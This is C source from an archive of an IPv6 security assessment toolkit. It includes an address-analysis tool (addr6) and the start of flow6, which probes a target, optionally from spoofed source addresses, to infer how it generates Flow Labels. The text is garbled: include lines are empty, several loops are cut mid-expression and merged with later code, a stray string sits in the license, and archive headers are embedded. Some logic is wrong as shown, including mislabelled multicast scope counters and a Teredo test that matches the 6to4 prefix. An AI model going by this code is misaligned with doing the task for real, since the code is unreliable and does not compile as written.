iidtype= iidteredorfc4380; break; case IID_TEREDO_RFC5991: iidtype= iidteredorfc5991; break; case IID_TEREDO_UNKNOWN: iidtype= iidteredounknown; break; } } break; case IPV6_MULTICAST: type= ipv6multicast; iidtype= unspecified; iidsubtype= unspecified; switch(addr->subtype){ case MCAST_PERMANENT: subtype= mcastpermanent; break; case MCAST_NONPERMANENT: subtype= mcastnonpermanent; break; case MCAST_INVALID: subtype= mcastinvalid; break; case MCAST_UNICASTBASED: subtype= mcastunicastbased; break; case MCAST_EMBEDRP: subtype= mcastembedrp; break; case MCAST_UNKNOWN: subtype= mcastunknown; break; } } switch(addr->scope){ case SCOPE_RESERVED: scope= scopereserved; break; case SCOPE_INTERFACE: scope= scopeinterface; break; case SCOPE_LINK: scope= scopelink; break; case SCOPE_ADMIN: scope= scopeadmin; break; case SCOPE_SITE: scope= scopesite; break; case SCOPE_ORGANIZATION: scope= scopeorganization; break; case SCOPE_GLOBAL: scope= scopeglobal; break; case SCOPE_UNSPECIFIED: scope= scopeunspecified; break; default: scope= scopeunassigned; break; } printf("%s=%s=%s=%s=%s\n", type, subtype, scope, iidtype, iidsubtype); } /* * Function: usage() * * Prints the syntax of the scan6 tool */ void usage(void){ puts("usage: addr6 (-i | -a) [-d | -s | -q] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the scan6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "addr6: An IPv6 address analysis tool\n"); usage(); puts("\nOPTIONS:\n" " --address, -a IPv6 address to be decoded\n" " --stdin, -i Read IPv6 addresses from stdin (standard input)\n" " --print-decode, -d Decode IPv6 addresses\n" " --print-stats, -s Print statistics about IPv6 addresses\n" " --print-unique, -q Discard duplicate IPv6 addresses\n" " --accept, -j Accept IPv6 addresses from specified IPv6 prefix\n" " --accept-type, -b Accept IPv6 addresses of specified type\n" " --accept-scope, -k Accept IPv6 addresses of specified scope\n" " --accept-utype, -w Accept IPv6 unicast addresses of specified type\n" " --accept-iid, -g Accept IPv6 addresses with IIDs of specified type\n" " --block, -J Block IPv6 addresses from specified IPv6 prefix\n" " --block-type, -B Block IPv6 addresses of specified type\n" " --block-scope, -K Block IPv6 addresses of specified scope\n" " --block-utype, -W Block IPv6 unicast addresses of specified type\n" " --block-iid, -G Block IPv6 addresses with IIDs of specified type\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the addr6 tool\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: Strnlen() * * Our own version of strnlen(), since some OSes do not support it. */ size_t Strnlen(const char *s, size_t maxlen){ size_t i=0; while(s[i] != 0 && i < maxlen) i++; if(i < maxlen) return(i); else return(maxlen); } /* * Function: init_host_list() * * Initilizes a host_list structure */ int init_host_list(struct host_list *hlist){ unsigned int i; bzero(hlist, sizeof(struct host_list)); if( (hlist->host = malloc(MAX_LIST_ENTRIES * sizeof(struct host_entry *))) == NULL){ return(0); } for(i=0; i < MAX_LIST_ENTRIES; i++) hlist->host[i]= NULL; hlist->nhosts= 0; hlist->maxhosts= MAX_HOST_ENTRIES; hlist->key_l= rand(); hlist->key_h= rand(); return(1); } /* * Function: key() * * Compute a key for accessing the hash-table of a host_list structure */ u_int16_t key(struct host_list *hlist, struct in6_addr *ipv6){ return( ((hlist->key_l ^ ipv6->s6_addr16[0] ^ ipv6->s6_addr16[7]) \ ^ (hlist->key_h ^ ipv6->s6_addr16[1] ^ ipv6->s6_addr16[6])) % MAX_LIST_ENTRIES); } /* * Function: add_host_entry() * * Add a host_entry structure to the hash table */ struct host_entry *add_host_entry(struct host_list *hlist, struct in6_addr *ipv6){ struct host_entry *hentry, *ptr; u_int16_t hkey; hkey= key(hlist, ipv6); if(hlist->nhosts >= hlist->maxhosts){ return(NULL); } if( (hentry= malloc(sizeof(struct host_entry))) == NULL){ return(NULL); } bzero(hentry, sizeof(struct host_entry)); hentry->ip6 = *ipv6; hentry->next= NULL; if(hlist->host[hkey] == NULL){ /* First node in chain */ hlist->host[hkey]= hentry; hentry->prev= NULL; } else{ /* Find last node in list */ for(ptr=hlist->host[hkey]; ptr->next != NULL; ptr= ptr->next); hentry->prev= ptr; ptr->next= hentry; } (hlist->nhosts)++; return(hentry); } /* * Function: is_ip6_in_list() * * Checks whether an IPv6 address is present in a host list. */ unsigned int is_ip6_in_list(struct host_list *hlist, struct in6_addr *target){ u_int16_t ckey; struct host_entry *chentry; ckey= key(hlist, target); for(chentry= hlist->host[ckey]; chentry != NULL; chentry=chentry->next) if( is_eq_in6_addr(target, &(chentry->ip6)) ) return 1; return 0; } /* * Function: is_eq_in6_addr() * * Compares two IPv6 addresses. Returns 1 if they are equal. */ int is_eq_in6_addr(struct in6_addr *ip1, struct in6_addr *ip2){ unsigned int i; for(i=0; i<8; i++) if(ip1->s6_addr16[i] != ip2->s6_addr16[i]) return 0; return 1; } /* * Function: print_stats() * * Prints IPv6 address statistics */ void print_stats(struct stats6 *stats){ unsigned int totaliids=0; puts("\n** IPv6 General Address Analysis **\n"); printf("Total IPv6 addresses: %u\n", stats->total); printf("Unicast: %7u (%.2f%%)\t\tMulticast: %7u (%.2f%%)\n", stats->ipv6unicast, \ ((float)(stats->ipv6unicast)/stats->total) * 100, stats->ipv6multicast, ((float)(stats->ipv6multicast)/stats->total) * 100); printf("Unspec.: %7u (%.2f%%)\n\n", stats->ipv6unspecified, ((float)(stats->ipv6unspecified)/stats->total) * 100); if(stats->ipv6unicast){ puts("** IPv6 Unicast Addresses **\n"); printf("Loopback: %7u (%.2f%%)\t\tIPv4-mapped: %7u (%.2f%%)\n",\ stats->ucastloopback, ((float)(stats->ucastloopback)/stats->ipv6unicast) * 100, stats->ucastv4mapped, \ ((float)(stats->ucastv4mapped)/stats->ipv6unicast) * 100); printf("IPv4-compat.: %7u (%.2f%%)\t\tLink-local: %7u (%.2f%%)\n", stats->ucastv4compat, \ ((float)(stats->ucastv4compat)/stats->ipv6unicast) * 100, stats->ucastlinklocal, \ ((float)(stats->ucastlinklocal)/stats->ipv6unicast) * 100); printf("Site-local: %7u (%.2f%%)\t\tUnique-local: %7u (%.2f%%)\n", stats->ucastsitelocal, \ ((float)(stats->ucastsitelocal)/stats->ipv6unicast) * 100, stats->ucastuniquelocal, \ ((float)(stats->ucastuniquelocal)/stats->ipv6unicast) * 100); printf("6to4: %7u (%.2f%%)\t\tTeredo: %7u (%.2f%%)\n", stats->ucast6to4, \ ((float)(stats->ucast6to4)/stats->ipv6unicast) * 100, stats->ucastteredo, \ ((float)(stats->ucastteredo)/stats->ipv6unicast) * 100); printf("Global: %7u (%.2f%%)\n\n", stats->ucastglobal, ((float)(stats->ucastglobal)/stats->ipv6unicast) * 100); } if(stats->ipv6multicast){ puts("** IPv6 Multicast Addresses **\n"); puts("+ Multicast Address Types +"); printf("Permanent: %7u (%.2f%%)\t\tNon-permanent %7u (%.2f%%)\n",\ stats->mcastpermanent, ((float)(stats->mcastpermanent)/stats->ipv6multicast) * 100, stats->mcastnonpermanent, \ ((float)(stats->mcastnonpermanent)/stats->ipv6multicast) * 100); printf("Invalid: %7u (%.2f%%)\t\tUnicast-based: %7u (%.2f%%)\n", stats->mcastinvalid, \ ((float)(stats->mcastinvalid)/stats->ipv6multicast) * 100, stats->mcastunicastbased, \ ((float)(stats->mcastunicastbased)/stats->ipv6multicast) * 100); printf("Embedded-RP: %7u (%.2f%%)\t\tUnknown: %7u (%.2f%%)\n\n", stats->mcastembedrp, \ ((float)(stats->mcastembedrp)/stats->ipv6multicast) * 100, stats->mcastunknown, \ ((float)(stats->mcastunknown)/stats->ipv6multicast) * 100); puts("+ Multicast Address Scopes +"); printf("Reserved: %7u (%.2f%%)\t\tInterface: %7u (%.2f%%)\n",\ stats->mscopereserved, ((float)(stats->mscopereserved)/stats->ipv6multicast) * 100, stats->mscopeinterface, \ ((float)(stats->mscopeinterface)/stats->ipv6multicast) * 100); printf("Link: %7u (%.2f%%)\t\tAdmin: %7u (%.2f%%)\n", stats->mnscopelink, \ ((float)(stats->mnscopelink)/stats->ipv6multicast) * 100, stats->mscopeadmin, \ ((float)(stats->mscopeadmin)/stats->ipv6multicast) * 100); printf("Site: %7u (%.2f%%)\t\tOrganization: %7u (%.2f%%)\n", stats->mscopesite, \ ((float)(stats->mscopesite)/stats->ipv6multicast) * 100, stats->mscopeorganization, \ ((float)(stats->mscopeorganization)/stats->ipv6multicast) * 100); printf("Global: %7u (%.2f%%)\t\tUnassigned: %7u (%.2f%%)\n\n", stats->mscopeadmin, \ ((float)(stats->mscopeadmin)/stats->ipv6multicast) * 100, stats->mscopesite, \ ((float)(stats->mscopesite)/stats->ipv6multicast) * 100); } totaliids= stats->ucastglobal + stats->ucastlinklocal + stats->ucastsitelocal + stats->ucastuniquelocal + \ stats->ucast6to4; if(totaliids){ puts("** IPv6 Interface IDs **\n"); printf("Total IIDs analyzed: %u\n", totaliids); printf("IEEE-based: %7u (%.2f%%)\t\tLow-byte: %7u (%.2f%%)\n",\ stats->iidmacderived, ((float)(stats->iidmacderived)/totaliids) * 100, stats->iidlowbyte, ((float)(stats->iidlowbyte)/totaliids) * 100); printf("Embed-IPv4: %7u (%.2f%%)\t\tEmbed-IPv4 (64): %7u (%.2f%%)\n", stats->iidmbeddedipv4, \ ((float)(stats->iidmbeddedipv4)/totaliids) * 100, stats->iidembeddedipv4_64, \ ((float)(stats->iidembeddedipv4_64)/totaliids) * 100); printf("Embed-port: %7u (%.2f%%)\t\tEmbed-port (r): %7u (%.2f%%)\n", stats->iidembeddedport, \ ((float)(stats->iidembeddedport)/totaliids) * 100, stats->iidembeddedportrev, \ ((float)(stats->iidembeddedportrev)/totaliids) * 100); printf("ISATAP: %7u (%.2f%%)\t\tByte-pattern: %7u (%.2f%%)\n", stats->iidisatap, \ ((float)(stats->iidisatap)/totaliids) * 100, stats->iidpatternbytes, \ ((float)(stats->iidpatternbytes)/totaliids) * 100); printf("Randomized: %7u (%.2f%%)\n\n", stats->iidrandom, ((float)(stats->iidrandom)/totaliids) * 100); } } /* * Function match_ipv6() * * Finds if an IPv6 address matches a prefix in a list of prefixes. */ unsigned int match_ipv6(struct in6_addr *prefixlist, u_int8_t *prefixlen, unsigned int nprefix, struct in6_addr *ipv6addr){ unsigned int i, j; struct in6_addr dummyipv6; for(i=0; i>1) | 0x8000; ipv6addr->s6_addr16[skip-1]= ipv6addr->s6_addr16[skip-1] & htons(mask); } for(i=skip; i<8; i++) ipv6addr->s6_addr16[i]=0; } ipv6toolkit-1.5.1/tools/addr6.h000066400000000000000000000103161223702747200163300ustar00rootroot00000000000000 #define MAX_LINE_SIZE 250 #define MAX_TYPE_SIZE 25 #define MAX_LIST_ENTRIES 65535 #define MAX_HOST_ENTRIES 4000000 #define IPV6_UNSPEC 1 #define IPV6_MULTICAST 2 #define IPV6_UNICAST 4 #define UCAST_V4MAPPED 1 #define UCAST_V4COMPAT 2 #define UCAST_LINKLOCAL 4 #define UCAST_SITELOCAL 8 #define UCAST_UNIQUELOCAL 16 #define UCAST_6TO4 32 #define UCAST_TEREDO 64 #define UCAST_GLOBAL 128 #define UCAST_LOOPBACK 256 #define MCAST_PERMANENT 512 #define MCAST_NONPERMANENT 1024 #define MCAST_INVALID 2048 #define MCAST_UNICASTBASED 4096 #define MCAST_EMBEDRP 8192 #define MCAST_UNKNOWN 16384 #define SCOPE_RESERVED 1 #define SCOPE_INTERFACE 2 #define SCOPE_LINK 4 #define SCOPE_ADMIN 8 #define SCOPE_SITE 16 #define SCOPE_ORGANIZATION 32 #define SCOPE_GLOBAL 64 #define SCOPE_UNASSIGNED 128 #define SCOPE_UNSPECIFIED 256 #define IID_MACDERIVED 1 #define IID_ISATAP 2 #define IID_EMBEDDEDIPV4 4 #define IID_EMBEDDEDPORT 8 #define IID_EMBEDDEDPORTREV 16 #define IID_LOWBYTE 32 #define IID_EMBEDDEDIPV4_64 64 #define IID_PATTERN_BYTES 128 #define IID_RANDOM 256 #define IID_TEREDO_RFC4380 512 #define IID_TEREDO_RFC5991 1024 #define IID_TEREDO_UNKNOWN 2048 #define IID_UNSPECIFIED 4096 /* Filter Constants */ #define MAX_BLOCK 50 #define MAX_ACCEPT 50 struct decode6{ struct in6_addr ip6; unsigned int type; unsigned int subtype; unsigned int scope; unsigned int iidtype; unsigned int iidsubtype; }; struct host_entry{ struct in6_addr ip6; struct host_entry *next; struct host_entry *prev; }; struct host_list{ struct host_entry **host; /* Double-linked list of host entries */ unsigned int nhosts; /* Current number of host entries */ unsigned int maxhosts; /* Maximum number of host entries */ u_int16_t key_l; /* Low-order word of the hash key */ u_int16_t key_h; /* High-order word of the hash key */ }; struct stats6{ unsigned int total; unsigned int ipv6unspecified; unsigned int ipv6multicast; unsigned int ipv6unicast; unsigned int ucastloopback; unsigned int ucastv4mapped; unsigned int ucastv4compat; unsigned int ucastlinklocal; unsigned int ucastsitelocal; unsigned int ucastuniquelocal; unsigned int ucast6to4; unsigned int ucastteredo; unsigned int ucastglobal; unsigned int mcastpermanent; unsigned int mcastnonpermanent; unsigned int mcastinvalid; unsigned int mcastunicastbased; unsigned int mcastembedrp; unsigned int mcastunknown; unsigned int iidmacderived; unsigned int iidisatap; unsigned int iidmbeddedipv4; unsigned int iidembeddedport; unsigned int iidembeddedportrev; unsigned int iidlowbyte; unsigned int iidembeddedipv4_64; unsigned int iidpatternbytes; unsigned int iidrandom; unsigned int mscopereserved; unsigned int mscopeinterface; unsigned int mnscopelink; unsigned int mscopeadmin; unsigned int mscopesite; unsigned int mscopeorganization; unsigned int mscopeglobal; unsigned int mscopeunassigned; unsigned int mscopeunspecified; }; #ifndef IN6_IS_ADDR_UNIQUELOCAL #define IN6_IS_ADDR_UNIQUELOCAL(a) \ ((((uint32_t *) (a))[0] & htonl (0xfe000000)) \ == htonl (0xfc000000)) #endif #ifndef IN6_IS_ADDR_6TO4 #define IN6_IS_ADDR_6TO4(a) \ ((((uint32_t *) (a))[0] & htonl (0xffff0000)) \ == htonl (0x20020000)) #endif #ifndef IN6_IS_ADDR_TEREDO #define IN6_IS_ADDR_TEREDO(a) \ (((uint32_t *) (a))[0] == htonl (0x20020000)) #endif #ifndef IN6_IS_ADDR_TEREDO_LEGACY #define IN6_IS_ADDR_TEREDO_LEGACY(a) \ (((uint32_t *) (a))[0] == htonl (0x3ffe831f)) #endif #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #ifndef s6_addr16 #define s6_addr16 __u6_addr.__u6_addr16 #endif #ifndef s6_addr #define s6_addr __u6_addr.__u6_addr8 #endif #ifndef s6_addr8 #define s6_addr8 __u6_addr.__u6_addr8 #endif #ifndef s6_addr32 #define s6_addr32 __u6_addr.__u6_addr32 #endif #elif defined __linux__ #ifndef s6_addr16 #define s6_addr16 __in6_u.__u6_addr16 #endif #ifndef s6_addr32 #define s6_addr32 __in6_u.__u6_addr32 #endif #endif /* This causes Linux to use the BSD definition of the TCP and UDP header fields */ #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif ipv6toolkit-1.5.1/tools/flow6.c000066400000000000000000000570051223702747200163660ustar00rootroot00000000000000/* * flow6: A security assessment tool that determines the Flow Label * generation policy of a target node * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks (www.si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warrsi6networks.allanty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make flow6 * * This program has been tested to compile and run on: Debian GNU/Linux 6.0, * FreeBSD 9.0, NetBSD 5.1, OpenBSD 5.0, Ubuntu 11.10, and Mac OS X. * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include #include #include #include #include #include #include #include #include #include "flow6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void print_attack_info(void); void usage(void); void print_help(void); int send_fid_probe(void); int predict_flow_id(u_int32_t *, unsigned int, u_int32_t *, unsigned int); /* Used for router discovery */ struct iface_data idata; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end, *pkt_ptr; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct tcp_hdr *pkt_tcp; struct udp_hdr *pkt_udp; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; char iface[IFACE_LENGTH]; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int frags, nfrags, nsleep; unsigned char srcpreflen; u_int16_t mask, ip6length; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char localaddr_f=0; unsigned char srcprefix_f=0, hoplimit_f=0, flowidp_f=0, dstport_f=0, protocol_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char *fragpart, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* For the sampling of Flow Label values */ u_int16_t baseport, lastport, dstport, tcpwin, addr_sig, addr_key; u_int32_t tcpseq; u_int8_t protocol; int main(int argc, char **argv){ extern char *optarg; fd_set sset, rset; struct timeval timeout; int r, sel; time_t curtime, start, lastfrag1=0; /* Arrays for storing the Flow ID samples */ u_int32_t test1[NSAMPLES], test2[NSAMPLES]; unsigned int ntest1=0, ntest2=0; unsigned char testtype; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"protocol", required_argument, 0, 'P'}, {"dst-port", no_argument, 0, 'p'}, {"flow-label-policy", no_argument, 0, 'W'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:S:D:P:p:Wvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ srcpreflen = atoi(charptr); if(srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), srcpreflen); srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Protocol */ if(strncmp(optarg, "tcp", MAX_STRING_SIZE) == 0 || \ strncmp(optarg, "TCP", MAX_STRING_SIZE) == 0){ protocol= IPPROTO_TCP; } else if(strncmp(optarg, "udp", MAX_STRING_SIZE) == 0 || \ strncmp(optarg, "UDP", MAX_STRING_SIZE) == 0){ protocol= IPPROTO_UDP; } else{ puts("Unknown protocol type (valid types: 'tcp', 'udp')"); exit(EXIT_FAILURE); } protocol_f= 1; break; case 'p': /* Destination port */ dstport= atoi(optarg); dstport_f=1; break; case 'W': /* Assess the Flow Label generation policy of the target */ flowidp_f= 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("flow6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata.max_packet_size = ETH_DATA_LEN; if(idata.verbose_f){ print_attack_info(); } if(!idata.dstaddr_f){ puts("Error: Nothing to send! (Destination Address left unspecified)"); exit(EXIT_FAILURE); } /* Assess the Flow ID generation policy */ if(flowidp_f){ if(dstport_f && !protocol_f){ puts("Error: Must specify a protocol if the port number is specified"); exit(EXIT_FAILURE); } if(!protocol_f){ protocol= IPPROTO_TCP; dstport= 80; } else if(!dstport_f){ if(protocol == IPPROTO_TCP) dstport= 80; else dstport= 53; } puts("Identifying the 'Flow ID' generation policy of the target node...."); if(protocol == IPPROTO_TCP){ tcpwin= ((u_int16_t) random() + 1500) & (u_int16_t)0x7f00; tcpseq= random(); baseport= 50000+ random()%10000; lastport= baseport; } /* Set filter for receiving Neighbor Solicitations, and TCP segments */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_NSTCP_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); lastfrag1=0; ntest1=0; ntest2=0; testtype= FIXED_ORIGIN; if(srcprefix_f){ randprefix= idata.srcaddr; randpreflen=srcpreflen; } else{ randprefix= idata.srcaddr; randpreflen=64; sanitize_ipv6_prefix(&randprefix, randpreflen); } while(1){ curtime=time(NULL); if( testtype==FIXED_ORIGIN && ((curtime - start) >= ID_ASSESS_TIMEOUT || ntest1 >= NSAMPLES)){ testtype= MULTI_ORIGIN; addr_sig= random(); addr_key= random(); start= curtime; continue; } else if( testtype==MULTI_ORIGIN && ((curtime - start) >= ID_ASSESS_TIMEOUT || ntest2 >= NSAMPLES)){ break; } if((curtime - lastfrag1) >= 1){ if(testtype == FIXED_ORIGIN){ for(i=0; icaplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6 && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(testtype==FIXED_ORIGIN){ if(!localaddr_f && is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.srcaddr))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else{ if(pkt_ns->nd_ns_target.s6_addr16[5] != addr_sig || \ pkt_ns->nd_ns_target.s6_addr16[7] != (pkt_ns->nd_ns_target.s6_addr16[6] ^ addr_key)) continue; if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(pkt_ipv6->ip6_nxt == protocol){ /* Perform TCP-specific validation checks */ if(protocol == IPPROTO_TCP){ if( (pkt_end - (unsigned char *) pkt_ipv6) < \ (sizeof(struct ip6_hdr) + sizeof(struct tcp_hdr))) continue; pkt_tcp= (struct tcp_hdr *) ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)); /* * The TCP Destination Port must correspond to one of the ports that we have used as * TCP Source Port */ if(ntohs(pkt_tcp->th_dport) < baseport || ntohs(pkt_tcp->th_dport) > lastport) continue; /* The Source Port must be that to which we're sending our TCP segments */ if(ntohs(pkt_tcp->th_sport) != dstport) continue; /* The TCP Acknowledgement Number must ack our SYN */ if(ntohl(pkt_tcp->th_ack) != tcpseq+1) continue; /* We sample Flow ID's only on SYN/ACKs */ if( (pkt_tcp->th_flags & ~TH_SYN) == 0 || (pkt_tcp->th_flags & TH_ACK) == 0) continue; /* The TCP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; } /* Perform UDP-specific validation checks */ else if(protocol == IPPROTO_UDP){ if( (pkt_end - (unsigned char *) pkt_ipv6) < \ (sizeof(struct ip6_hdr) + sizeof(struct udp_hdr))) continue; pkt_udp= (struct udp_hdr *) ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)); /* * The UDP Destination Port must correspond to one of the ports that we have used as * the UDP Source Port */ if(ntohs(pkt_udp->uh_dport) < baseport || ntohs(pkt_udp->uh_dport) > lastport) continue; /* The Source Port must be that to which we're sending our UDP datagrams */ if(ntohs(pkt_udp->uh_sport) != dstport) continue; /* The UDP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_udp, pkt_end-((unsigned char *)pkt_udp), IPPROTO_UDP) != 0) continue; } if(testtype==FIXED_ORIGIN){ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } if(ntest1 >= NSAMPLES) continue; test1[ntest1]= ntohl(pkt_ipv6->ip6_flow) & 0x000fffff; ntest1++; } else{ if(pkt_ipv6->ip6_dst.s6_addr16[5] != addr_sig || \ pkt_ipv6->ip6_dst.s6_addr16[7] != (pkt_ipv6->ip6_dst.s6_addr16[6] ^ addr_key)){ continue; } if(ntest2 >= NSAMPLES) continue; test2[ntest2]= ntohl(pkt_ipv6->ip6_flow) & 0x000fffff; ntest2++; } } } if(idata.verbose_f > 1){ printf("Sampled %u Flow Labels from single-origin probes\n", ntest1); for(i=0; isrc = idata.hsrcaddr; ethernet->dst = idata.hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata.type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata.srcaddr; ipv6->ip6_dst= idata.dstaddr; ipv6->ip6_nxt= protocol; if(protocol == IPPROTO_TCP){ tcp= (struct tcp_hdr *) ( (unsigned char *) ipv6 + sizeof(struct ip6_hdr)); ptr= (unsigned char *) tcp + sizeof(struct tcp_hdr); bzero(tcp, sizeof(struct tcp_hdr)); tcp->th_sport= htons(lastport); tcp->th_dport= htons(dstport); tcp->th_seq = htonl(tcpseq); tcp->th_ack= htonl(0); tcp->th_flags= TH_SYN;; 